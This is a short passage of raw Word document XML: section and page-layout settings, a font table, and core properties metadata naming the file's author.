    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:footnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>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Consolas">
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="Trebuchet MS"/>
  <w:font w:name="Segoe UI Emoji">
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="等线"/>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D6">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D5">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Arial" w:eastAsia="等线" w:hAnsi="Calibr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suthan</dc:creator>
  <cp:lastModifiedBy>Hari suthan</cp:lastModifiedBy>
</cp:coreProperties>
</file>